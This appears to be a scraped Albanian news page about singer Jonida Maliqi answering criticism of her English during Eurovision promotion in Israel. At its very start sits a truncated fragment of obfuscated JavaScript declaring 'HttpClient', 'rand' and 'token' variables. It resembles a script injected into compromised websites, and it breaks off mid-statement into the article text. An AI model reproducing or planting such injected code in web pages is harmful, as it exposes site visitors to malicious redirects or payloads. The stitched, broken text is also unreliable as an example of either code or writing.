;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

U përqesh shumë për anglishten e saj, ja çfarë ka për të thënë Jonida si fund

By

Ajo ndodhej prej ditësh në Izreal duke promovuar këngën e saj dhe Shqipërinë, ndërsa ka dhënë edhe intervista për media të ndryshme.

Sigurisht intervistat janë dhënë në gjuhën angleze dhe asaj i është kërkuar të flasë për Shqipërinë e këngën e saj. Mirëpo në intervistat e dhëna në gjuhën angleze, ajo ka lënë shumë për të dëshiruar meqë çalon në njohuritë e gjuhës angleze.

Derisa njëra nga gazetaret po i jepte komplimente për stilin dhe dukjen dhe po i thurte fjalë miradie për
njohuritë që ka për modën, Maliqi në përgjigjet e saja ka bërë gabime që vinin si rrjedhojë e pamundësisë për tu artikuluar në anglisht.

Në një instervistë për Revista Class, ajo ndër tjerash foli edhe për kritikat e shakatë që vërshuan internetin për shkak të anglishtes së saj të thyer.  Ajo u pyet se kush e mbështeti dhe  çfarë mendon për komentet nda anglishtes së saj dhe ajo përgjigjet:

“Me Enedën kemi qenë përgjatë gjithë kohës në kontakt me njëra-tjetrën dhe e falënderoj jo vetëm atë, por të gjithë kolegët që më mbështetën pa pushim dhe më këshilluan si ta menaxhoja më së miri këtë rrugëtim, për sa kohë e kishin kaluar mbi supe Eurovisionin. Përsa i përket anglishtes, ishte e pritshme në një vend si ky i yni, ku jemi të gatshëm të kapemi pas çdo suksesi që kalon dikush, si e si për të përdhosur figurën e tij. Rast si i imi, që nuk e flas perfekt këtë gjuhë (por ama të gjitha mediat ndërkombëtare i bëra për vete), kishte plot të tjerë, si Mahmood, përfaqësuesi i Italisë apo ai i Armenisë, por kurrsesi populli i tyre nuk i gjykoi për këtë, sepse arti, muzika, kënga janë prioritet në këtë event dhe shtetet e tjera, me sa duket, e mirëkuptojnë.”

 

Artikuj të ngjashëm